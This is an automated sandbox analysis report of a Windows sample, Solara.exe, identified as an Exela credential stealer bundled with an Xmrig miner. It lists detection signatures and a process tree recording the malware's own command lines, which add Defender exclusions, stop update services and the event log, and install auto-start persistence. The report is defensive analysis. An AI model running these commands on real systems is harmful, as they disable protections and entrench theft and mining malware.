Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Solara.exe

Overview

General Information

Sample name:Solara.exe
Analysis ID:1589392
MD5:cc6d7a6b17febe201b7f7d26ce944c08
SHA1:231e8439c0facca7cc4b730bf950351d48e3a7c2
SHA256:b1883486b5e6da993af6deb6f4d0f524ccdc6317bdc32ed50dccd1799867a3bd
Tags:exeuser-zhuzhu0009
Infos:

Detection

Python Stealer, Exela Stealer, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Exela Stealer
Yara detected Python Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Changes security center settings (notifications, updates, antivirus, firewall)
Creates multiple autostart registry keys
Detected generic credential text file
Drops PE files to the startup folder
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses powercfg.exe to modify the power settings
Writes or reads registry keys via WMI
Yara detected Generic Python Stealer
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • svchost.exe (PID: 6648 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Solara.exe (PID: 5852 cmdline: "C:\Users\user\Desktop\Solara.exe" MD5: CC6D7A6B17FEBE201B7F7D26CE944C08)
    • powershell.exe (PID: 1512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Solara.exe (PID: 2044 cmdline: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" MD5: 089094590DF5698B03A7428A5864ED33)
      • powershell.exe (PID: 2468 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5576 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 5920 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 4704 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3416 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7144 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4360 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3180 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6904 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 1512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6380 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 2040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 5868 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6064 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6044 cmdline: C:\Windows\system32\sc.exe delete "PGYNROQK" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4304 cmdline: C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4864 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6468 cmdline: C:\Windows\system32\sc.exe start "PGYNROQK" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Exela.exe (PID: 7088 cmdline: "C:\Users\user~1\AppData\Local\Temp\Exela.exe" MD5: 0615D49BE12C174704A3DAAD945F7B56)
      • Exela.exe (PID: 2980 cmdline: "C:\Users\user~1\AppData\Local\Temp\Exela.exe" MD5: 0615D49BE12C174704A3DAAD945F7B56)
        • Conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 2040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 2044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rdqanwpudvuj.exe (PID: 7076 cmdline: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe MD5: 089094590DF5698B03A7428A5864ED33)
    • powershell.exe (PID: 1496 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1840 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6120 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • Conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6352 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 960 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6740 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4008 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1272 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5696 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5828 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5092 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3812 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 5200 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 4300 cmdline: conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Solara.exe (PID: 3700 cmdline: "C:\Users\user\AppData\Local\Temp\Solara.exe" MD5: 089094590DF5698B03A7428A5864ED33)
    • powershell.exe (PID: 2468 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Solara.exe" -Verb runAs MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Solara.exe (PID: 3896 cmdline: "C:\Users\user\AppData\Local\Temp\Solara.exe" MD5: 089094590DF5698B03A7428A5864ED33)
        • powershell.exe (PID: 2044 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5980 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wusa.exe (PID: 4524 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • sc.exe (PID: 6352 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Solara.exe (PID: 6364 cmdline: "C:\Users\user\AppData\Local\Temp\Solara.exe" MD5: 089094590DF5698B03A7428A5864ED33)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000004D.00000003.2068669850.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ExelaStealerYara detected Exela StealerJoe Security
      0000004D.00000003.2070969941.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ExelaStealerYara detected Exela StealerJoe Security
        0000004D.00000002.2093996201.0000019BB72E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000004D.00000003.2072039698.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ExelaStealerYara detected Exela StealerJoe Security
            0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_ExelaStealerYara detected Exela StealerJoe Security
              Click to see the 18 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              66.2.conhost.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                66.2.conhost.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                • 0x37ef98:$a1: mining.set_target
                • 0x371220:$a2: XMRIG_HOSTNAME
                • 0x373b48:$a3: Usage: xmrig [OPTIONS]
                • 0x3711f8:$a4: XMRIG_VERSION
                66.2.conhost.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                66.2.conhost.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
                • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
                • 0x3cd180:$s3: \\.\WinRing0_
                • 0x376148:$s4: pool_wallet
                • 0x3705f0:$s5: cryptonight
                • 0x370600:$s5: cryptonight
                • 0x370610:$s5: cryptonight
                • 0x370620:$s5: cryptonight
                • 0x370638:$s5: cryptonight
                • 0x370648:$s5: cryptonight
                • 0x370658:$s5: cryptonight
                • 0x370670:$s5: cryptonight
                • 0x370680:$s5: cryptonight
                • 0x370698:$s5: cryptonight
                • 0x3706b0:$s5: cryptonight
                • 0x3706c0:$s5: cryptonight
                • 0x3706d0:$s5: cryptonight
                • 0x3706e0:$s5: cryptonight
                • 0x3706f8:$s5: cryptonight
                • 0x370710:$s5: cryptonight
                • 0x370720:$s5: cryptonight
                • 0x370730:$s5: cryptonight

                Sigma Signatures

                Change of critical system settings

                barindex
                Sigma detected: Disable power options
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solara.exe, ParentProcessId: 2044, ParentProcessName: Solara.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6904, ProcessName: powercfg.exe

                System Summary

                barindex
                Sigma detected: New RUN Key Pointing to Suspicious Folder
                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Solara.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Solara.exe, ProcessId: 5852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 1512, ProcessName: powershell.exe
                Sigma detected: Script Interpreter Execution From Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 1512, ProcessName: powershell.exe
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 1512, ProcessName: powershell.exe
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 1512, ProcessName: powershell.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Solara.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Solara.exe, ProcessId: 5852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 1512, ProcessName: powershell.exe
                Sigma detected: Startup Folder File Write
                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Exela.exe, ProcessId: 2980, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe
                Sigma detected: Use Short Name Path in Command Line
